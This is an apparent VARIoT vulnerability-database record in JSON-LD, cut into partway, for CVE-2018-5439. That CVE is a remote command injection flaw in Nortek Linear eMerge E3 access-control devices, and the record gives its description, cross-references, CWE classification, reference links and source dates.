          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A Command Injection issue was discovered in Nortek Linear eMerge E3 series Versions V0.32-07e and prior. A remote attacker may be able to execute arbitrary code on a target machine with elevated privileges. Nortek Security\u0026Control is a company that provides wireless security, home automation and personal security systems and devices. The platform provides scalable, browser-based access control capabilities",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-5439",
            "trust": 3.4
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-046-01",
            "trust": 3.2
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424",
            "trust": 0.8
          },
          {
            "db": "BID",
            "id": "103053",
            "trust": 0.6
          },
          {
            "db": "IVD",
            "id": "E2E3C6C0-39AB-11E9-B2E3-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-99009",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "id": "VAR-201802-1043",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          }
        ],
        "trust": 1.9
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          }
        ]
      },
      "last_update_date": "2023-12-18T10:50:29.652000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://nortekcontrol.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.3,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-046-01"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5439"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5439"
          },
          {
            "trust": 0.6,
            "url": "https://www.securityfocus.com/bid/103053"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/77.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-02-26T00:00:00",
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "date": "2018-02-26T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "date": "2018-02-19T00:00:00",
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "date": "2018-02-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "date": "2018-04-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "date": "2018-02-19T18:29:00.210000",
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "date": "2018-02-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-02-26T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-135470"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-5439"
          },
          {
            "date": "2018-04-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-002424"
          },
          {
            "date": "2019-10-09T23:41:21.517000",
            "db": "NVD",
            "id": "CVE-2018-5439"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nortek Linear eMerge E3 Series Command injection vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-03483"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ],
        "trust": 1.4
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Command injection",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201802-814"
          }
        ],
        "trust": 0.8
      }
    }